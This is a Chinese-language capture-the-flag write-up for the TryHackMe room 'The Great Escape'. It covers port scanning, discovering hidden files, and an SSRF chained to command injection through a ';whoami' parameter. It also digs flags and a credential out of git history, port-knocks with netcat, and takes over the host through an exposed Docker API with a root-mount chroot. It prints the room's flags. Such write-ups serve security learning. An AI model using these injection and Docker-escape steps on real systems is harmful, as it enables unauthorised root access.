打靶记录(四七)之THMTheGreatEscape

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.179.159 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 21:03 CST
Nmap scan report for 10.10.179.159
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

sudo nmap -sT -sV -sC -O -p22,80 10.10.70.210                                                                           [sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 00:02 CST
Nmap scan report for 10.10.70.210 (10.10.70.210)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   GenericLines: 
|_    [AM)nZVux:OF
80/tcp open  http    nginx 1.19.6
|_http-title: docker-escape-nuxt
|_http-server-header: nginx/1.19.6
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.94%I=7%D=10/3%Time=651AE9B3%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,E,"\[AM\)nZVux:OF\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Web

根据房间提示“wellknown”，可以生成一些目录字典来爆破，我就直接看WP来用了，存在一个.well-known的目录

feroxbuster --url=http://escape.thm/.well-known/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt  -x rar zip txt bak php html

用不了gobuster，有一个security.txt文件，访问得到一个目录/api/fl46,并且要以head方式请求

curl -I http://ip/api/fl46

flag1

THM{b801135794bf1ed3a2aafaa44c2e5ad4}

扫目录扫到一个robots.txt

User-agent: *
Allow: /
Disallow: /api/

# Disallow: /exif-util

Disallow: /*.bak.txt$

/exif-util是一个上传界面，URL那边可能可以文件包含？

还有一个*.bak.txt，也就是说存在备份文件，也许需要我们fuzz一下，但是FUZZ不出什么的东西，房间提示说开发人员把备份文件乱放，也许是这个应用的备份

尝试访问aki.bak.txt和exif-util.bak.txt，发现后者存在。看了一下貌似是API调用的备份，大概是用url为参数GET请求这个API

猜测是在/api/exif目录下调用的，但是api-dev-backup应该是另外一台主机，尝试访问

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif

尝试访问

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=http://localhost

命令中存在banned word…竟然还有过滤

http://escape.thm/api/exif?url=http://api-dev-backup:8080/exif?url=1;whoami

发现存在命令注入,身份还是root，不过应该是api-dev-backup这台主机的，不出意外是docker

发现一个/root/dev-note.txt

hydra/fluffybunnies123

但是既不能用于SSH登录，也不能用于web服务登录，NOTE说他删除了这个STUFF，嘶

Git

继续探索/root，发现是一个GIT仓库

git log 

git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8

切换到最初的记录

再次ls,

flag2

THM{0cb4b947043cb5c0486a454b75a10876}

Docker逃逸

除此之外还有一个最初的dev-note

knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port

我们需要发个文这些端口去开放docker端口？

用netcat吧

nc escape.thm 42
nc escape.thm 1337
nc escape.thm 10420
nc escape.thm 6969
nc escape.thm 63000

sudo nmap -A --min-rate 10000 -p- escape.thm

发现开放了2375docker端口

docker -H escape.thm images
REPOSITORY                                    TAG       IMAGE ID       CREATED       SIZE
exif-api-dev                                  latest    4084cb55e1c7   2 years ago   214MB
exif-api                                      latest    923c5821b907   2 years ago   163MB
frontend                                      latest    577f9da1362e   2 years ago   138MB
endlessh                                      latest    7bde5182dc5e   2 years ago   5.67MB
nginx                                         latest    ae2feff98a0c   2 years ago   133MB
debian                                        10-slim   4a9cd57610d6   2 years ago   69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   2 years ago   103MB
alpine                                        3.9       78a2ce922f86   3 years ago   5.55MB

docker -H escape.thm:2375 run -v /:/mnt --rm -it nginx chroot /mnt sh

直接启动一个nginx镜像（用其他的应该也行）并将宿主机的根目录挂在到/mnt。并将根目录切换为/mnt，这样我们就相当于拿到了宿主机的权限

flag3

THM{c62517c0cad93ac93a92b1315a32d734}

碎碎念

相当有难度的靶机QAQ，尤其是目录发现，还有API调用那边做得懵懵的。不过后面的docker逃逸过程还是挺有意思的，又碰到了熟悉的git。也学到了新的逃逸方法